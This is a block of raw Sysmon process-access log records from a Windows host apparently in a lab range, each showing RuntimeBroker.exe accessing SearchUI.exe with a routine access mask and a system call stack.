12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
